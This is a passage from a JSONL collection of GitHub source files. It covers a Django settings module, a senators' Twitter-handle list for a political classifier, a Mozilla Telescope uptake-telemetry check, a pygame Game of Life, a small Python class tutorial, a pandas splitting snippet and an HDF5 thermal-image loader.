'rest_framework.schemas.coreapi.AutoSchema',\n 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',\n 'DEFAULT_PERMISSIONS_CLASSES': (\n 'rest_framework.permissions.AllowAny',\n ),\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ),\n 'DEFAULT_PARSER_CLASSES': (\n 'rest_framework.parsers.JSONParser',\n ),\n 'PAGE_SIZE': 20,\n}\n\n# SIMPLE JWT SETTINGS\nACCESS_TOKEN_LIFETIME = int(os.environ.get('ACCESS_TOKEN_LIFETIME', 20))\nREFRESH_TOKEN_LIFETIME = int(os.environ.get('REFRESH_TOKEN_LIFETIME', 60))\nALGORITHM = os.environ.get('ALGORITHM')\nAUTH_HEADER_TYPES = os.environ.get('AUTH_HEADER_TYPES')\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': timedelta(minutes=ACCESS_TOKEN_LIFETIME),\n 'REFRESH_TOKEN_LIFETIME': timedelta(days=REFRESH_TOKEN_LIFETIME),\n 'ROTATE_REFRESH_TOKENS': False,\n 'BLACKLIST_AFTER_ROTATION': True,\n 'UPDATE_LAST_LOGIN': False,\n\n 'ALGORITHM': ALGORITHM,\n 'SIGNING_KEY': SECRET_KEY,\n 'VERIFYING_KEY': None,\n 'AUDIENCE': None,\n 'ISSUER': None,\n\n 'AUTH_HEADER_TYPES': (AUTH_HEADER_TYPES,),\n 'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',\n 'USER_ID_FIELD': 'id',\n 'USER_ID_CLAIM': 'user_id',\n\n 'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),\n 'TOKEN_TYPE_CLAIM': 'token_type',\n\n 'JTI_CLAIM': 'jti',\n\n 'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',\n 'SLIDING_TOKEN_LIFETIME': timedelta(minutes=5),\n 'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),\n}\n\n# CREDENTIALS FOR DEFAULT SUPERUSER\nDEFAULT_SUPER_USER_USERNAME = os.environ.get('DEFAULT_SUPER_USER_USERNAME') # type: ignore\nDEFAULT_SUPER_USER_PASSWORD = os.environ.get('DEFAULT_SUPER_USER_PASSWORD') # type: ignore\nDEFAULT_SUPER_USER_EMAIL = os.environ.get('DEFAULT_SUPER_USER_EMAIL') # type: ignore\n\n# SET CUSTOM USER MODEL\nAUTH_USER_MODEL = 'account.User'\n\n# Internationalization\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = os.environ.get('TIME_ZONE', default='Europe/Moscow') # type: ignore\n\nCELERY_TIME_ZONE = os.environ.get('TIME_ZONE', default='Europe/Moscow') # type: ignore\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# REDIS\nREDIS_HOST = os.environ.get('REDIS_HOST') # type: ignore\nREDIS_PORT = os.environ.get('REDIS_PORT') # type: ignore\n\n# CELERY\nCELERY_BROKER_URL = f'redis://{REDIS_HOST}:{REDIS_PORT}/0' # type: ignore\nCELERY_BROKER_TRANSPORT_OPTIONS 
= {'visibility_timeout': 3600}\nCELERY_RESULT_BACKEND = f'redis://{REDIS_HOST}:{REDIS_PORT}/0' # type: ignore\n\n# TELEGRAM SETTINGS\nBOT_TOKEN = os.environ.get('BOT_TOKEN') # type: ignore\nORDER_CHAT_ID = os.environ.get('ORDER_CHAT_ID') # type: ignore\nADMINS_CHAT_IDS = os.environ.get('ADMINS', default='').split(',') # type: ignore\n\n# AWS\nAWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID') # type: ignore\nAWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY') # type: ignore\nORDER_BUCKET = os.environ.get('ORDER_BUCKET') # type: ignore\nBUCKET_REGION = os.environ.get('BUCKET_REGION') # type: ignore\n\n# TWILIO\nTWILIO_ACCOUNT_SID = os.environ.get('TWILIO_ACCOUNT_SID') # type: ignore\nTWILIO_AUTH_TOKEN = os.environ.get('TWILIO_AUTH_TOKEN') # type: ignore\nTWILIO_PHONE_NUMBER = os.environ.get('TWILIO_PHONE_NUMBER') # type: ignore\n\n# GOOGLE SHEETS\nSHEET = os.environ.get('SHEET')\nORDER_WORK_SHEET = os.environ.get('ORDER_WORK_SHEET')\nMASTER_WORK_SHEET = os.environ.get('MASTER_WORK_SHEET')\n\n# STATIC FILES\nSTATIC_URL = \"/staticfiles/\"\nSTATIC_ROOT = os.path.join(BASE_DIR, \"staticfiles\")\n\n# MEDIA FILES\nMEDIA_URL = \"/mediafiles/\"\nMEDIA_ROOT = os.path.join(BASE_DIR, \"mediafiles\")\n\n# Default primary key field type\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n","repo_name":"xal9wiii4ik/ommy_poland","sub_path":"app/ommy_polland/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":7409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21964406170","text":"# screen_names.py\n# Contains lists of users' screen names used for training data\n\n# List of pairs of screen names and part label for US senators\nsenators = [\n # Republicans\n ('SenatorStrange', 'R'), # Luther Strange (R-AL)\n ('SenJohnKennedy', 'R'), # John N. 
Kennedy (R-LA)\n ('SenThomTillis', 'R'), # Thom Tillis (R-NC)\n ('SenSasse', 'R'), # Ben Sasse (R-NE)\n ('SenatorRounds', 'R'), # Mike Rounds (R-SD)\n ('SenDanSullivan', 'R'), # Dan Sullivan (R-AK)\n ('sendavidperdue', 'R'), # David Perdue (R-GA)\n ('SenJoniErnst', 'R'), # Joni Ernst (R-IA)\n ('SenateMajLdr', 'R'), # Mitch McConnell (R-KY) (Majority Leader)\n ('SenatorRisch', 'R'), # Jim Risch (R-ID)\n ('SenTedCruz', 'R'), # Ted Cruz (R-TX)\n ('SenatorFischer', 'R'), # Deb Fischer (R-NE)\n ('SenTomCotton', 'R'), # Tom Cotton (R-AR)\n ('MikeCrapo', 'R'), # Mike Crapo (R-ID)\n ('SenThadCochran', 'R'), # Thad Cochran (R-MS)\n ('LindseyGrahamSC', 'R'), # Lindsey Graham (R-SC)\n ('SenJohnHoeven', 'R'), # John Hoeven (R-ND)\n ('SenJohnThune', 'R'), # John Thune (R-SD)\n ('SenatorEnzi', 'R'), # Mike Enzi (R-WY)\n ('SenDeanHeller', 'R'), # Dean Heller (R-NV)\n ('SenatorWicker', 'R'), # Roger Wicker (R-MS)\n ('senorrinhatch', 'R'), # Orrin Hatch (R-UT)\n ('RonWyden', 'R'), # Ron Wyden (R-OR)\n ('SenCoryGardner', 'R'), # Cory Gardner (R-CO)\n ('SenToddYoung', 'R'), # Todd Young (R-IN)\n ('SenRonJohnson', 'R'), # Ron Johnson (R-WI)\n ('SenatorLankford', 'R'), # James Lankford (R-OK)\n ('SenToomey', 'R'), # Pat Toomey (R-PA)\n ('SenatorTimScott', 'R'), # Tim Scott (R-SC)\n ('RandPaul', 'R'), # Rand Paul (R-KY)\n ('SenJohnBarrasso', 'R'), # John Barrasso (R-WY)\n ('SenCapito', 'R'), # Shelley Moore Capito (R-WV)\n ('SenatorIsakson', 'R'), # Johnny Isakson (R-GA)\n ('SenAlexander', 'R'), # Lamar Alexander (R-TN)\n ('SenPatRoberts', 'R'), # Pat Roberts (R-KS)\n ('SenBobCorker', 'R'), # Bob Corker (R-TN)\n ('BillCassidy', 'R'), # Bill Cassidy (R-LA)\n ('RoyBlunt', 'R'), # Roy Blunt (R-MO)\n ('SenatorBurr', 'R'), # Richard Burr (R-NC)\n ('SenShelby', 'R'), # Richard Shelby (R-AL)\n ('SenatorCollins', 'R'), # Susan Collins (R-ME)\n ('SenJohnMcCain', 'R'), # John McCain (R-AZ)\n ('senrobportman', 'R'), # Rob Portman (R-OH)\n ('JerryMoran', 'R' ), # Jerry Moran (R-KS)\n ('lisamurkowski', 'R'), # Lisa Murkowski (R-AK)\n ('JeffFlake', 'R'), # Jeff Flake (R-AZ)\n ('marcorubio', 'R'), # Marco Rubio (R-FL)\n ('JohnCornyn', 'R'), # John Cornyn (R-TX)\n ('SteveDaines', 'R'), # Steve Daines (R-MT)\n ('ChuckGrassley', 'R'), # Chuck Grassley (R-IA)\n ('JimInhofe', 'R'), # Jim Inhofe (R-OK)\n ('JohnBoozman', 'R'), # John Boozman (R-AR)\n ('SenMikeLee', 'R'), # Mike Lee (R-UT)\n\n\n # Democrats\n ('SenCortezMasto', 'D'), # Cortez Masto (D-NV)\n ('SenKamalaHarris', 'D'), # Kamala Harris (D-CA)\n ('SenBrianSchatz', 'D'), # Brian Schatz (D-HI)\n ('MartinHeinrich', 'D'), # Martin Heinrich (D-NM)\n ('SenatorBaldwin', 'D'), # Tammy Baldwin (D-WI)\n ('SenatorHeitkamp', 'D'), # Heidi Heitkamp (D-ND)\n ('SenDuckworth', 'D'), # Tammy Duckworth (D-IL)\n ('SenWarren', 'D'), # Elizabeth Warren (D-MA)\n ('SenatorHassan', 'D'), # Maggie Hassan (D-NH)\n ('SenatorTester', 'D'), # Jon Tester (D-MT)\n ('SenJackReed', 'D'), # Jack Reed (D-RI)\n ('SenFeinstein', 'D'), # Dianne Feinstein (D-CA)\n ('PattyMurray', 'D'), # Patty Murray (D-WA)\n ('SenBlumenthal', 'D'), # Richard Blumenthal (D-CT)\n ('SenatorCarper', 'D'), # Tom Carper (D-DE)\n ('SenatorDurbin', 'D'), # Dick Durbin (D-IL)\n ('SenatorLeahy', 'D'), # Patrick Leahy (D-VT)\n ('SenWhitehouse', 'D'), # Sheldon Whitehouse (D-RI)\n ('SenGaryPeters', 'D'), # Gary Peters (D-MI)\n ('Sen_JoeManchin', 'D'), # Joe Manchin (D-WV)\n ('SenBennetCO', 'D'), # Michael Bennet (D-CO)\n ('SenDonnelly', 'D'), # Joe Donnelly (D-IN)\n ('timkaine', 'D'), # Tim Kaine (D-VA)\n ('SenBobCasey', 'D'), # Bob Casey 
Jr. (D-PA)\n ('ChrisMurphyCT', 'D'), # Chris Murphy (D-CT)\n ('SenatorCantwell', 'D'), # Maria Cantwell (D-WA)\n ('SenatorShaheen', 'D'), # Jeanne Shaheen (D-NH)\n ('SenatorCardin', 'D'), # Ben Cardin (D-MD)\n ('maziehirono', 'D'), # Mazie Hirono (D-HI)\n ('SenStabenow', 'D'), # Debbie Stabenow (D-MI)\n ('SenGillibrand', 'D'), # Kirsten Gillibrand (D-NY)\n ('SenatorTomUdall', 'D'), # Tom Udall (D-NM)\n ('brianschatz', 'D'), # Brian Schatz (D-HI)\n ('SenSherrodBrown', 'D'), # Sherrod Brown (D-OH)\n ('amyklobuchar', 'D'), # Amy Klobuchar (D-MN)\n ('SenJeffMerkley', 'D'), # Jeff Merkley (D-OR)\n ('SenMarkey', 'D'), # Ed Markey (D-MA)\n ('SenBillNelson', 'D'), # Bill Nelson (D-FL)\n ('stabenow', 'D'), # Debbie Stabenow (D-MI)\n ('SenatorMenendez', 'D'), # Bob Menendez (D-NJ)\n ('ChrisVanHollen', 'D'), # Chris Van Hollen (D-MD)\n ('SenSchumer', 'D'), # Chuck Schumer (D-NY)\n ('clairecmc', 'D'), # Claire McCaskill (D-MO)\n ('CoryBooker', 'D'), # Cory Booker (D-NJ)\n ('ChrisCoons', 'D'), # Chris Coons (D-DE)\n ('MarkWarner', 'D'), # Mark Warner (D-VA)\n ('alfranken', 'D'), # Al Franken (D-MN)\n\n\n # Independents\n ('SenAngusKing', 'I'), # Angus King (I-ME)\n ('SenSanders', 'I'), # Bernie Sanders (I-VT)\n\n\n #'GrahamBlog', # TODO\n #'dscc', # Senate Democrats\n #'SenateGOP', # Senate Republicans\n #'SenateDems', # TODO SENATE DEMS\n #'SenateBudget', #\n #'SenateAgDems', # TODO\n #'McConnellPress', # TODO\n #'SenCoonsOffice', # TODO\n\n]\n","repo_name":"charlesrwinston/PoliticalClassifier","sub_path":"classifier/screen_names.py","file_name":"screen_names.py","file_ext":"py","file_size_in_byte":5942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13721162102","text":"\"\"\"\nThe percentage of reported errors in Uptake Telemetry should be under the specified\nmaximum. Error rate is computed for each period of 10min.\n\nFor each recipe whose error rate is above the maximum, the total number of events\nfor each status is returned. 
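For example, with the statuses shown in the sample payload at the bottom of this check (56 + 5 error events out of 101 events in total), the error rate of that period is 61 * 100 / 101 ≈ 60.4%.\n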
The min/max timestamps give the datetime range of the\nobtained dataset.\n\"\"\"\nimport re\nfrom collections import Counter, defaultdict\nfrom typing import Dict, List, Tuple, Union\n\nfrom telescope.typings import CheckResult\nfrom telescope.utils import csv_quoted, fetch_bigquery, fetch_json\n\n\nEXPOSED_PARAMETERS = [\"max_error_percentage\", \"min_total_events\"]\nDEFAULT_PLOT = \".max_rate\"\n\nEVENTS_TELEMETRY_QUERY = r\"\"\"\n-- This query returns the total of events received per recipe and status.\n\n-- The events table receives data every 5 minutes.\n\nWITH event_uptake_telemetry AS (\n SELECT\n normalized_channel,\n timestamp AS submission_timestamp,\n UNIX_SECONDS(timestamp) AS epoch,\n (CASE WHEN session_start_time > timestamp THEN timestamp ELSE session_start_time END) AS client_timestamp,\n event_string_value,\n event_map_values,\n event_category,\n event_object\n FROM\n `moz-fx-data-shared-prod.telemetry_derived.events_live`\n WHERE\n timestamp > TIMESTAMP_SUB(CURRENT_TIMESTAMP(), INTERVAL {period_hours} HOUR)\n {channel_condition}\n),\nuptake_telemetry AS (\n SELECT\n submission_timestamp,\n normalized_channel,\n client_timestamp,\n event_string_value AS status,\n `moz-fx-data-shared-prod`.udf.get_key(event_map_values, \"source\") AS source,\n epoch - MOD(epoch, 600) AS period\n FROM\n event_uptake_telemetry\n WHERE event_category = 'uptake.remotecontent.result'\n AND event_object = 'normandy'\n -- Sanity check for client timestamps\n AND client_timestamp > TIMESTAMP_SUB(submission_timestamp, INTERVAL 1 DAY)\n)\nSELECT\n -- Min/Max timestamps of this period\n PARSE_TIMESTAMP('%s', CAST(period AS STRING)) AS min_timestamp,\n PARSE_TIMESTAMP('%s', CAST(period + 600 AS STRING)) AS max_timestamp,\n normalized_channel AS channel,\n source,\n status,\n COUNT(*) AS total\nFROM uptake_telemetry\nWHERE source LIKE 'normandy/%'\nGROUP BY period, normalized_channel, source, status\nORDER BY period, normalized_channel, source, status\n\"\"\"\n\nNORMANDY_URL = \"{server}/api/v1/recipe/signed/?enabled=1\"\n\n# Normandy uses the Uptake telemetry statuses in a specific way.\n# See https://searchfox.org/mozilla-central/rev/4218cb868d8deed13e902718ba2595d85e12b86b/toolkit/components/normandy/lib/Uptake.jsm#23-43\nUPTAKE_STATUSES = {\n \"recipe_action_disabled\": \"custom_1_error\",\n \"recipe_didnt_match_filter\": \"backoff\",\n \"recipe_execution_error\": \"apply_error\",\n \"recipe_filter_broken\": \"content_error\",\n \"recipe_invalid_action\": \"download_error\",\n \"runner_invalid_signature\": \"signature_error\",\n \"action_pre_execution_error\": \"custom_1_error\",\n \"action_post_execution_error\": \"custom_2_error\",\n}\n\n# Invert status dict {(\"recipe\", \"custom_1_error\"): \"recipe_action_disabled\", ...}\nNORMANDY_STATUSES = {(k.split(\"_\")[0], v): k for k, v in UPTAKE_STATUSES.items()}\n\n\nasync def fetch_normandy_uptake(channels: List[str], period_hours: int):\n # Filter by channel if parameter is specified.\n channel_condition = (\n f\"AND LOWER(normalized_channel) IN ({csv_quoted(channels)})\" if channels else \"\"\n )\n return await fetch_bigquery(\n EVENTS_TELEMETRY_QUERY.format(\n period_hours=period_hours, channel_condition=channel_condition\n )\n )\n\n\ndef sort_dict_desc(d, key):\n return dict(sorted(d.items(), key=key, reverse=True))\n\n\nasync def run(\n max_error_percentage: Union[float, Dict],\n server: str,\n min_total_events: int = 20,\n ignore_status: List[str] = [],\n sources: List[str] = [],\n channels: List[str] = [],\n period_hours: int = 6,\n) -> 
CheckResult:\n if not isinstance(max_error_percentage, dict):\n max_error_percentage = {\"default\": max_error_percentage}\n # max_error_percentage[\"default\"] is mandatory.\n max_error_percentage.setdefault(\"with_telemetry\", max_error_percentage[\"default\"])\n max_error_percentage.setdefault(\n \"with_classify_client\", max_error_percentage[\"default\"]\n )\n\n # By default, only look at recipes.\n if len(sources) == 0:\n sources = [\"recipe\"]\n\n sources_re = [re.compile(s) for s in sources]\n\n # Ignored statuses are specified using the Normandy ones.\n ignored_status = [UPTAKE_STATUSES.get(s, s) for s in ignore_status]\n\n # Fetch list of enabled recipes from Normandy server.\n normandy_url = NORMANDY_URL.format(server=server)\n normandy_recipes = await fetch_json(normandy_url)\n enabled_recipes_by_ids = {\n str(r[\"recipe\"][\"id\"]): r[\"recipe\"] for r in normandy_recipes\n }\n enabled_recipe_ids = enabled_recipes_by_ids.keys()\n\n rows = await fetch_normandy_uptake(channels=channels, period_hours=period_hours)\n\n min_timestamp = min(r[\"min_timestamp\"] for r in rows)\n max_timestamp = max(r[\"max_timestamp\"] for r in rows)\n\n # We will store reported events by period, by collection,\n # by version, and by status.\n # {\n # ('2020-01-17T07:50:00', '2020-01-17T08:00:00'): {\n # 'recipes/113': {\n # 'success': 4699,\n # 'sync_error': 39\n # },\n # ...\n # }\n # }\n periods: Dict[Tuple[str, str], Dict] = {}\n for row in rows:\n # Check if the source matches the selected ones.\n source = row[\"source\"].replace(\"normandy/\", \"\")\n if not any(s.match(source) for s in sources_re):\n continue\n\n period: Tuple[str, str] = (\n row[\"min_timestamp\"].isoformat(),\n row[\"max_timestamp\"].isoformat(),\n )\n periods.setdefault(period, defaultdict(Counter))\n\n status = row[\"status\"]\n if \"recipe\" in source:\n # Make sure this recipe is enabled, otherwise ignore.\n rid = row[\"source\"].split(\"/\")[-1]\n if rid not in enabled_recipe_ids:\n continue\n # In Firefox 67, `custom_2_error` was used instead of `backoff`.\n if status == \"custom_2_error\":\n status = \"backoff\"\n\n periods[period][source][status] += row[\"total\"]\n\n error_rates: Dict[str, Dict] = {}\n min_rate = None\n max_rate = None\n for (min_period, max_period), by_collection in periods.items():\n # Compute error rate by period.\n # This allows us to prevent the error rate from being \"spread\" over the overall datetime\n # range of events (e.g. 
a spike of errors during 10min over 2H).\n for source, all_statuses in by_collection.items():\n total_statuses = sum(total for status, total in all_statuses.items())\n\n # Ignore uptake Telemetry of a certain recipe if the total of collected\n # events is too small.\n if total_statuses < min_total_events:\n continue\n\n # Show overridden status in check output.\n source_type = source.split(\"/\")[0]\n statuses = {\n NORMANDY_STATUSES.get((source_type, status), status): total\n for status, total in all_statuses.items()\n if status not in ignored_status\n }\n ignored = {\n NORMANDY_STATUSES.get((source_type, status), status): total\n for status, total in all_statuses.items()\n if status in ignored_status\n }\n total_errors = sum(\n total\n for status, total in statuses.items()\n if UPTAKE_STATUSES.get(status, status).endswith(\"_error\")\n )\n error_rate = round(total_errors * 100 / total_statuses, 2)\n\n if min_rate is None:\n min_rate = max_rate = error_rate\n else:\n min_rate = min(min_rate, error_rate)\n max_rate = max(max_rate, error_rate)\n\n # If error rate for this period is below threshold, or lower than one reported\n # in another period, then we ignore it.\n other_period_rate = error_rates.get(source, {\"error_rate\": 0.0})[\n \"error_rate\"\n ]\n\n details = {}\n max_percentage = max_error_percentage[\"default\"]\n if \"recipe\" in source:\n rid = source.split(\"/\")[-1]\n recipe = enabled_recipes_by_ids[rid]\n with_telemetry = \"normandy.telemetry\" in recipe[\"filter_expression\"]\n with_classify_client = \"normandy.country\" in recipe[\"filter_expression\"]\n details[\"name\"] = recipe[\"name\"]\n details[\"with_telemetry\"] = with_telemetry\n details[\"with_classify_client\"] = with_classify_client\n if with_telemetry:\n max_percentage = max_error_percentage[\"with_telemetry\"]\n # If recipe has both Telemetry and Classify Client, keep highest threshold.\n if with_classify_client:\n max_percentage = max(\n max_percentage, max_error_percentage[\"with_classify_client\"]\n )\n\n if error_rate < max_percentage or error_rate < other_period_rate:\n continue\n\n error_rates[source] = {\n \"error_rate\": error_rate,\n **details,\n \"statuses\": sort_dict_desc(statuses, key=lambda item: item[1]),\n \"ignored\": sort_dict_desc(ignored, key=lambda item: item[1]),\n \"min_timestamp\": min_period,\n \"max_timestamp\": max_period,\n }\n\n sort_by_rate = sort_dict_desc(error_rates, key=lambda item: item[1][\"error_rate\"])\n\n data = {\n \"sources\": sort_by_rate,\n \"min_rate\": min_rate,\n \"max_rate\": max_rate,\n \"min_timestamp\": min_timestamp.isoformat(),\n \"max_timestamp\": max_timestamp.isoformat(),\n }\n \"\"\"\n {\n \"sources\": {\n \"recipes/123\": {\n \"error_rate\": 60.4,\n \"name\": \"Disable OS auth\",\n \"with_classify_client\": true,\n \"with_telemetry\": false,\n \"statuses\": {\n \"recipe_execution_error\": 56,\n \"success\": 35,\n \"action_post_execution_error\": 5\n },\n \"ignored\": {\n \"recipe_didnt_match_filter\": 5\n },\n \"min_timestamp\": \"2020-01-17T08:10:00\",\n \"max_timestamp\": \"2020-01-17T08:20:00\",\n },\n ...\n },\n \"min_rate\": 2.1,\n \"max_rate\": 60.4,\n \"min_timestamp\": \"2020-01-17T08:00:00\",\n \"max_timestamp\": \"2020-01-17T10:00:00\"\n }\n \"\"\"\n return len(sort_by_rate) == 0, 
data\n","repo_name":"mozilla-services/telescope","sub_path":"checks/normandy/uptake_error_rate.py","file_name":"uptake_error_rate.py","file_ext":"py","file_size_in_byte":10727,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"76"} +{"seq_id":"22624166189","text":"import functools\nimport operator\nfrom typing import Set\nimport pygame\nfrom life.world import World\nimport random as rand\nfrom life.coordinate import Coordinate\n\n\nclass Game:\n \"\"\"\n represents an instance of Conway's Game of Life\n\n fields:\n world: World\n an instance of World with a state and a method to transition to the next state\n\n cell_size: int\n The desired size of a rendered cell. Cells are square, so length == width == size\n\n methods:\n play() -> None\n plays the game by rendering each state of the World on a Pygame surface until the user\n closes the game window\n \"\"\"\n def __init__(self, cell_size: int, initial_state: Set[Coordinate] = None) -> None:\n \"\"\"\n instantiates a Game\n\n :param cell_size: the desired size of a rendered cell in pixels\n\n :param initial_state: an initial state for a World\n\n :returns None\n \"\"\"\n self.__screen_dimensions = Game.__get_screen_dimensions()\n self.__validate_cell_size(cell_size)\n self.__cell_size = cell_size\n if initial_state is not None:\n self.world = World(initial_state)\n else:\n random_state = self.__get_random_state(0.075)\n self.world = World(random_state)\n\n @staticmethod\n def __get_screen_dimensions() -> Coordinate:\n \"\"\"\n returns screen dimensions in pixels as a tuple of form (width, height)\n\n :returns screen dimensions in pixels as a tuple of form (width, height)\n \"\"\"\n pygame.init()\n dimensions = Coordinate(pygame.display.Info().current_w, pygame.display.Info().current_h)\n pygame.quit()\n return dimensions\n\n def __validate_cell_size(self, cell_size: int) -> None:\n \"\"\"\n validates a given cell_size\n\n :raises ValueError if cell_size is negative or cell_size is too big for screen\n\n :param cell_size: the desired size of a rendered cell in pixels\n\n :returns None\n \"\"\"\n if cell_size < 0:\n raise ValueError(\"The cell_size cannot be negative.\")\n\n cell_is_too_big = any(dim for dim in self.__screen_dimensions if cell_size > dim)\n if cell_is_too_big:\n raise ValueError(\"The cell_size must not exceed any of the screen's dimensions.\")\n\n def __get_random_state(self, density: float) -> Set[Coordinate]:\n \"\"\"\n returns a random state scaled to fill the screen when rendered\n\n :raises ValueError if density is not in the interval [0, 1]\n\n :param density: the proportion of all cells possible to render on the screen that are live\n\n :returns a random state scaled to fill the screen when rendered\n \"\"\"\n if density < 0 or density > 1:\n raise ValueError(\"The value of density must be in the interval [0, 1].\")\n\n screen_area = functools.reduce(operator.mul, self.__screen_dimensions, 1)\n cell_area = self.__cell_size ** 2\n total_cells = screen_area // cell_area\n desired_cells = int(total_cells * density)\n max_coordinate = Coordinate(*(d // self.__cell_size for d in self.__screen_dimensions))\n candidates = [\n Coordinate(i, j)\n for i in range(max_coordinate.x + 1) for j in range(max_coordinate.y + 1)\n ]\n state = set(rand.sample(candidates, desired_cells))\n return state\n\n def play(self, delay: float) -> None:\n \"\"\"\n plays Conway's Game of Life\n\n continually renders each state of self.world on a Pygame surface until the user closes\n the game window\n\n 
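The world is rendered on a toroidal grid (scaled_coordinate below takes each\n coordinate modulo the screen dimensions), so cells that leave one edge of\n the screen re-enter from the opposite edge.\n\n 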
:param delay: the delay between iterations of the game loop in seconds (i.e. the approximate\n delay between rendered frames)\n\n :returns None\n \"\"\"\n def scaled_coordinate(coordinate: Coordinate) -> Coordinate:\n \"\"\"\n returns the given coordinate scaled by cell_size and adjusted for a toroidal grid\n\n A coordinate is scaled by cell_size by multiplying each component by cell_size. A\n coordinate is adjusted for a toroidal grid by taking the x-coordinate and y-coordinate\n modulo the screen width and screen height respectively.\n\n :returns the given coordinate adjusted for toroidal geometry and scaled by cell_size\n \"\"\"\n scaled_coordinate = (c * self.__cell_size for c in coordinate)\n scaled_coordinate = tuple(\n operator.mod(*entry) for entry in zip(scaled_coordinate, self.__screen_dimensions)\n )\n return scaled_coordinate\n\n pygame.init()\n surface = pygame.display.set_mode(self.__screen_dimensions, pygame.FULLSCREEN)\n colours = {'white': (255,) * 3, 'green': (0, 175, 0)}\n while not pygame.event.get(pygame.QUIT):\n surface.fill(colours['white'])\n for coordinate in self.world.state:\n cell = pygame.Rect(scaled_coordinate(coordinate), (self.__cell_size,) * 2)\n pygame.draw.rect(surface, colours['green'], cell)\n pygame.display.flip()\n self.world.next_state()\n pygame.time.delay(int(delay * 1000))\n pygame.quit()\n","repo_name":"bshapka/life-in-python","sub_path":"life/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"3499864189","text":"#class\n\nclass FourCal:\n def __init__(self,first,second):\n self.first = first\n self.second = second\n\n \n def setdata(self,first,second): # when defining a method, the first parameter must always be self\n self.first = first\n self.second = second\n\n def add(self):\n result = self.first + self.second\n return result\n def mul(self):\n result = self.first * self.second\n return result\n def sub(self):\n result = self.first - self.second\n return result\n def div(self):\n result = self.first / self.second \n return result\n\n # once a constructor is defined, arguments must be passed when creating an object, otherwise an error occurs\n\na=FourCal(1123123123,212342314124234)\na.setdata(10,20)\nprint(a.first)\nprint(a.second)\n\nb=FourCal(12354353543534525,524534532542543345)\nb.setdata(50,60)\nprint(b.first)\nprint(b.second)\nprint(b. add())\nprint(b. mul())\nprint(b. sub())\nprint(b. div())\n\n
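# SafeFourCal below demonstrates overriding: it changes only div() so that dividing\n# by zero returns 0 instead of raising ZeroDivisionError, and inherits everything\n# else from FourCal.\n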
# inheritance\nclass SafeFourCal(FourCal): # class inheritance\n def div(self): # method overriding\n if self.second==0:\n return 0\n else: return self.first / self.second\n \na=SafeFourCal(4,0)\nprint('SafeFourCal.div(4,0) => ',a.div())\n\na.setdata(4,2)\nprint(a.div())\n\n\n\n","repo_name":"yohan-j-park/yohanpark","sub_path":"Python/fourcal.py","file_name":"fourcal.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10553014533","text":"#### Separate multiple comma-separated values from a column ####\n\nimport pandas as pd\n\n### my data ###\ntt = pd.DataFrame({'IR': ['IR1', 'IR2', 'IR3', 'IR4', 'IR5'],\n 'category': ['vpn', 'vpn', 'teradata', 'account request', 'vpn'],\n 'approvers': ['UO1', 'UO1,UO2,UO3', 'UO1,UO2,UO3,UO4,UO5', 'UO1,SO1,SO3', 'SO3,UO1']})\n\ntt\n\n## create dataframe w/ rows for each ticket + approver\ntt_spread = tt.set_index('IR').approvers.str.split(',', expand=True).stack().reset_index(1, drop=True).reset_index(name='approvers')\ntt_spread\ntt_spread['approvers'].value_counts()\n\n## append back to original dataframe\nout = pd.merge(tt, tt_spread, how='inner', on='IR')\nout\nout['approvers_y'].value_counts()\n\n\n\n##### tickets #####\n\n\ncr = pd.read_excel(\"C:\\\\Work\\\\Requests\\\\Don Richards\\\\2018-08-15 change log text mining\\\\tickets_type.xlsx\")\ndf = cr\nlist(df)\n\ndf['approvers'] = df['approvers'].str.replace(' ','')\ndf['approvers']\n\ndf_split = df.set_index('Req ID').approvers.str.split(',', expand=True).stack().reset_index(1, drop=True).reset_index(name='approver')\n\nlist(df_split)\n\nout = pd.merge(df, df_split, how='inner', on='Req ID')\n\nout.to_excel(\"C:\\\\Work\\\\Requests\\\\Don Richards\\\\2018-08-15 change log text mining\\\\approver_dataset.xlsx\",\n index=False)\n\n","repo_name":"sqlitus/Python-Library","sub_path":"Scripts/Pandas - Separate multiple values in column.py","file_name":"Pandas - Separate multiple values in column.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22599160025","text":"\"\"\"\nAuthor: Dominik Limbach\nDescription: handle import and export of hdf5 data\n\"\"\"\n\nimport h5py\nimport numpy\nimport cv2\n\nimport os\nimport os.path\n\n\ndef thermal(h5filename, date, destination_dir):\n try:\n thermal_filename = 'Z:\\\\Thermal\\\\' + date + '\\\\' + h5filename\n th5file = h5py.File(thermal_filename, 'r')\n tdata = th5file['FRAMES']\n tstamps_t = th5file['Timestamps_ms']\n n_frames, height, width, total_time_ms = [tdata.attrs[i] for i in list(tdata.attrs)]\n tframe = tdata[200, 0:480, :]\n raw_img = cv2.normalize(tframe, None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX, dtype=cv2.CV_8U)\n disp_img = cv2.applyColorMap(raw_img, cv2.COLORMAP_HOT)\n cv2.imwrite(destination_dir + '\\\\preview_thermal.png', disp_img)\n except FileNotFoundError:\n blank_image = numpy.zeros((480, 640, 